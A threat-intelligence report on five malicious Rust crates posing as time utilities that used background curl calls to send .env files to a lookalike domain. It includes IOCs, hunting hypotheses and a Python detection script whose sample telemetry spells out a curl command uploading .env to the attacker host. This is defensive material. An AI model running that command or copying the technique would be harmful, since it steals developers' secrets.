
5 Malicious Rust Crates Posed as Time Utilities to Exfiltrate .env Files

A coordinated supply chain attack on the Rust ecosystem involved five malicious crates masquerading as time utilities. These crates silently exfiltrated .env files containing sensitive developer credentials to a threat actor-controlled lookalike domain using background curl processes.

Sens: Immediate | Conf: high | Analyzed: 2026-03-11

Authors: Socket Threat Research Team

Actors: dictorudin, gehakax777, suntea279491

Source: Socket

IOCs · 5

Key Takeaways

  • Five malicious Rust crates were discovered on crates.io masquerading as local time utilities.
  • The crates covertly exfiltrate .env files containing sensitive developer credentials to a lookalike domain (timeapis[.]io).
  • The malware uses curl to generate decoy HTTPS traffic before downgrading to an HTTP POST for exfiltration.
  • Execution is triggered unconditionally during routine parameter validation, requiring no special interaction from the developer.
  • The threat actor utilized typosquatting and brandjacking techniques to trick developers into downloading the crates.

Affected Systems

  • Rust developer environments
  • CI/CD pipelines
  • crates.io ecosystem

Attack Chain

The threat actor published malicious Rust crates to crates.io, masquerading as local time utilities using typosquatting and brandjacking. When a developer or CI pipeline executes the crate, routine parameter validation functions trigger background threads. The malware first generates decoy HTTPS traffic to a legitimate-looking domain using curl. It then downgrades to HTTP and uses curl to exfiltrate the local .env file via a multipart POST request to a lookalike domain.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Socket AI Scanner, cargo-audit, cargo-deny

The article does not provide raw detection rules but notes that tools like Socket AI Scanner, cargo-audit, and cargo-deny can identify or block these malicious crates.

Detection Engineering Assessment

  • EDR Visibility: Medium — EDRs can monitor process creation events (e.g., curl spawned by Rust binaries) and network connections, but might lack the context of the supply chain origin.
  • Network Visibility: High — The exfiltration occurs over plain HTTP to a specific lookalike domain, making network-level detection and blocking highly effective.
  • Detection Difficulty: Moderate — While the network traffic and curl execution are noisy, they occur in developer environments where curl and network requests are common, potentially leading to false positives if not tuned to specific domains or file targets.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • Network Connections (Sysmon Event ID 3)
  • DNS Queries (Sysmon Event ID 22)

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for unexpected child processes of build tools or compiled Rust binaries spawning curl with form upload arguments targeting .env files. | Process execution logs | Exfiltration | Low
Identify HTTP POST requests to the known lookalike domain or plain HTTP traffic containing .env file contents. | Network traffic logs, Proxy logs | Exfiltration | Low
Monitor for DNS resolution of the lookalike domain originating from developer workstations or CI/CD servers. | DNS query logs | Command and Control | Low
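The three hypotheses as runnable hunting logic over constructed Sysmon/proxy-style events. This is an added example, not detection content from the report or from Socket; the event field names, the BUILD_TOOLS set and the target/ parent-path heuristic are assumptions, and the body check generalizes the second hypothesis to any plain-HTTP POST carrying KEY=value lines, whatever the destination.

```python
import re, shlex
from urllib.parse import urlparse
LOOKALIKE_DOMAINS = {"timeapis.io"}                 # exfil domain named in the report
BUILD_TOOLS = {"cargo", "rustc", "cargo.exe", "rustc.exe"}   # assumption: parents of interest
DOTENV_LINE = re.compile(r"^[A-Z][A-Z0-9_]*=.+$", re.M)   # KEY=value lines, as in a .env file

def parse_curl(cmdline):
    """Return (method, url, uploaded_path) for a curl command line, else None."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].replace("\\", "/").rsplit("/", 1)[-1] not in ("curl", "curl.exe"):
        return None
    method, url, upload, i = "GET", None, None, 1
    while i < len(argv):
        arg, nxt = argv[i], (argv[i + 1] if i + 1 < len(argv) else "")
        if arg in ("-X", "--request"):
            method, i = nxt.upper(), i + 1
        elif arg in ("-F", "--form"):                   # -F always implies POST
            upload = nxt.split("=@", 1)[1] if "=@" in nxt else upload   # file=@path
            method, i = "POST", i + 1
        elif arg.startswith(("http://", "https://")):
            url = arg
        i += 1
    return method, url, upload

def hunt(events):
    """Return [(hypothesis_no, event_id)] for every event that matches a hypothesis."""
    hits = []
    for ev in events:
        if ev["type"] == "process_create":              # H1: build tool or target/ binary -> curl -F @.env
            parsed, parent = parse_curl(ev["cmdline"]), ev["parent"].replace("\\", "/")
            if parsed and (parsed[2] or "").replace("\\", "/").rsplit("/", 1)[-1] == ".env" \
                    and (parent.rsplit("/", 1)[-1] in BUILD_TOOLS or "/target/" in parent):
                hits.append((1, ev["id"]))
        elif ev["type"] == "http":                      # H2: POST to the lookalike, or .env-shaped body over plain http
            u = urlparse(ev["url"])
            if ev["method"] == "POST" and (u.hostname in LOOKALIKE_DOMAINS or
                    (u.scheme == "http" and DOTENV_LINE.search(ev.get("body", "")))):
                hits.append((2, ev["id"]))
        elif ev["type"] == "dns" and ev["query"] in LOOKALIKE_DOMAINS:   # H3: lookalike resolution
            hits.append((3, ev["id"]))
    return hits

# Constructed sample telemetry (not from the incident); e2 and e6 are benign controls.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process_create", "parent": "/home/dev/app/target/debug/timecheck",
     "cmdline": "curl -s -X POST -F file=@.env http://timeapis.io/upload"},
    {"id": "e2", "type": "process_create", "parent": "/bin/bash", "cmdline": "curl -s -m 3 https://timeapi.io/"},
    {"id": "e3", "type": "http", "method": "POST", "url": "http://timeapis.io/upload", "body": ""},
    {"id": "e4", "type": "http", "method": "POST", "url": "http://203.0.113.5/u", "body": "AWS_SECRET_ACCESS_KEY=x\nDB_PASSWORD=x"},
    {"id": "e5", "type": "dns", "query": "timeapis.io"},
    {"id": "e6", "type": "dns", "query": "timeapi.io"},
]
```

Running hunt(SAMPLE_EVENTS) flags e1, e3, e4 and e5 and leaves the decoy-style GET and the legitimate timeapi.io lookup alone, which is the tuning the assessment above calls for.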

Control Gaps

  • Lack of outbound network filtering in CI/CD pipelines
  • Implicit trust in open-source package registries without behavioral analysis

Key Behavioral Indicators

  • curl execution with arguments targeting .env files
  • HTTP POST to timeapis[.]io
  • Unexpected background threads in Rust applications making external network requests

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Remove the identified malicious crates (chrono_anchor, dnp3times, time_calibrator, time_calibrators, time-sync) from all projects.
  • Rotate any credentials, API keys, or tokens stored in .env files if the malicious crates were executed.

Infrastructure Hardening

  • Restrict outbound network access in build and test phases (CI/CD pipelines) to only required endpoints.
  • Implement DNS sinkholing for the known malicious domains (timeapis[.]io, kaoing[.]com).

User Protection

  • Use tools like cargo-audit and cargo-deny to enforce policies and check for yanked or malicious crates.
  • Deploy browser extensions or IDE plugins to flag suspicious dependencies during package review.

Security Awareness

  • Educate developers on the risks of typosquatting and brandjacking in package registries.
  • Promote the practice of pinning dependencies and reviewing new crates as thoroughly as code changes.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1204 - User Execution
  • T1036 - Masquerading
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1005 - Data from Local System
  • T1583.001 - Acquire Infrastructure: Domains
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1041 - Exfiltration Over C2 Channel

Additional IOCs

  • Domains:
    • timeapi[.]io - Domain used for decoy HTTPS GET requests.
    • kaoing[.]com - Disposable email domain used by the threat actor.
  • Urls:
    • hxxps://github[.]com/suntea279491 - GitHub account associated with the threat actor.
    • hxxps://github[.]com/dictorudin - GitHub account associated with the threat actor.
  • File Paths:
    • .env - Target file for exfiltration containing developer secrets and API keys.
  • Command Lines:
    • Purpose: Decoy traffic generation | Tools: curl | Stage: Execution/Evasion | curl -s -m 3
    • Purpose: Exfiltration of .env file via HTTP POST | Tools: curl | Stage: Exfiltration | curl -s -X POST
    • Purpose: Multipart form upload of local file | Tools: curl | Stage: Exfiltration | curl -F file=@
  • Other:
    • chrono_anchor - Malicious Rust crate
    • dnp3times - Malicious Rust crate
    • time_calibrator - Malicious Rust crate
    • time_calibrators - Malicious Rust crate
    • time-sync - Malicious Rust crate
    • gehakax777 - Threat actor alias
    • dictorudin - Threat actor alias
    • suntea279491 - Threat actor alias